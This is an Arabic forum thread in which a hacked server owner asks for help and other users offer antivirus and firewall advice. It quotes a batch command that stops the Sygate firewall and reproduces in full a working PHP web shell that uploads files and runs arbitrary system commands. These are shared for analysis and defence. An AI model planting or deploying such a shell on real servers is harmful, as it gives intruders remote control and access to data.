النجدة!! النجدة!!.. تم اختراق جهازي الشخصي بهذه البرامج

[swa52]

السلام عليكم يا اخواني الكرام:

النجدة!! النجدة!!.. تم اختراق جهازي الشخصي بهذه البرامج المرفقة مع الصورة:
وتم مسح محتويات phpMyAdmin

1- ارجو المساعدة, كيف سأحمي جهازي؟
2- هل سرق اللص الدنيء معلوماتي؟
3- ماذا أفعل؟

وشكرا لأولاد الحلال, والله يبعدنا عن الحرام.

[2PXL]

ركب zone alarm الجدار الناري
وركب مكافح فايروسات kaspersky

[mohandko]

مش فاهم حاجة ودا برنامج دا ولا اية ؟؟؟؟

[swa52]

اخي انا مركب sygate personal

وشوف الامر اللي اعطاه ببرنامج stop.bat

net stop "Sygate Personal Firewall" /y

وياريت احد ينصحنا بطريقة نحمي السيرفر الشخصي عن طريق مثلا.htaccess

او طريقة لاغلاق البورتات

يا ناس يا فاعلي الخير ساعدونا والله يجزاكم الف خير

[swa52]

اخواني الكرام:

هل يعرف احد منكم كيف زرع هذا الملعون برامجه عندي في السيرفر؟

نرجو من العارفين عدم البخل بالمعلومات وجزاكم الله بكل خير لكم ولوالديكم.

[swa52]

هذا ملف backup ربما يساعدكم في التحليل وحماية سيرفراتكم من هذا المتطفل:
---------------------

Upload your file:<form enctype="multipart/form-data" action="
<?php print $_SERVER["PHP_SELF"];?>" method="post">
<input type = "hidden" name = "MAX_FILE_FILE" value = "3096000" />
<input type = "file" name = "fileupload"><input type = "submit" value = "Upload!">
</form>
<?php
function myshellexec($cmd){
$result = "";
if (!empty($cmd)) {
if (is_callable("exec"))
{
exec($cmd,$result);
$result = join("\n",$result);
}
elseif (($result = `$cmd`) !== false)
{
}
elseif (is_callable("system"))
{
$v = @ob_get_contents();
@ob_clean();
system($cmd);
$result = @ob_get_contents();
@ob_clean();
echo $v;
}
elseif (is_callable("passthru"))
{
$v = @ob_get_contents();
@ob_clean();
passthru($cmd);
$result = @ob_get_contents();
@ob_clean();
echo $v;
}
elseif (is_resource($fp = popen($cmd,"r")))
{
$result = "";
while(!feof($fp)) {
$result .= fread($fp,1024);
}
pclose($fp);
}
}
return $result;
}
$uploaddir = getcwd() . "\\";$uploadfile = $uploaddir.basename($_FILES["fileupload"]["name"]);
print "<pre>";
if (move_uploaded_file($_FILES["fileupload"]["tmp_name"],$uploadfile))
{
print " File stored ok...\n";
}
print "</pre>";
?>
<hr>CMD:
<?php
$cmd=$_REQUEST["lastcmd"];
?>
<html><head><title>Got Shell?</title><style type="text/css">
<!-- body {color: #CC0000;background-color: #000000;} -->
</style></head><body><onLoad="document.forms[0].elements[lastcmd].focus()">
<form method="POST"><br/><input type=TEXT name="lastcmd" size=64 value="
<?php echo $_POST["lastcmd"]; ?>
"><input type = "submit" value = "Exec"><hr><pre>
<?php if($cmd != "")
{
$results = myshellexec(addslashes($cmd));print $results; }
print "</pre>";
print "</form>";
print "</body>";
print "</html>";
print phpinfo();
?>
--------------------------------------
لا تنسونا من الحماية الله يحميكم

[abady 999]

استخدمت برنامج الكاسبر سابقا واستطاع كشف ملفات php ملغمة .... انصحك به


الان بما ان برامجك اصيبت ... يجب عليك اخذ نسخ للبرامج السليمة والاحتفاظ بها جانبا ... والبرامج المشكوك بها حاول البحث جيدا داخلها حتى لا يكون بداخلها احد الملفات الضارة


اذا الفيروسات اصابت برامج السوفت وير فعليك بالكاسبر ومعه برنامج ادوير ... والزونا لارم بهذه الاصدارة Zone Alarm Professional لانه ينزل معه برنامج قوي وخفيف ويقوم بازالة ملفات التجسس


البحث بداخل البرامج التي تعمل مع بدء التشغيل يساعدك على ايقاف عمل الفيروسات بنسبة 90%
ضع هذا الامر في "تشغيل " من ابدأ
msconfig
ثم ابحث في برامج بدء التشغيل عن البرامج المشكوك في امرها وكن على حذر

اتمنى لك التوفيق


تحياتي لك

[أمير الظلام]

انصحك روح سوي فورمات وريح بالك وابتعد عن الملفات المشبوهه

[swa52]

أخي أمير الظلام
سويت فورمات ورجعت كل شي مثل أول
لكن يرحم والدين اللي يقدر يساعدنا في حماية السيرفر الشخصي والطريقة.
واحتمال كبير جدا انه اخذ باك اب للداتابيس

واعتقد انه تم رفع سركيبت backup.php بالاول لداخل مجلد phpMyAdmin
بعدين رفع بقية الملفات وانا جربت وتم رفعها رغم انا سويت .htaccess وحطيت بداخله:
RemoveType .php4 .php5 .shtml .phtml .pl .cgi .asp .aspx .exe .bat

الرجاء من العارفين:
1- كيف تم رفع هذا السكريبت الى داخل المجلد؟
2- كيف نمنع الرفع او تشغيل ملفات exe ؟

ونطلب المساعدة ممن يستطيعون تقديم المعرفة بهذا الخصوص.
ومشكورين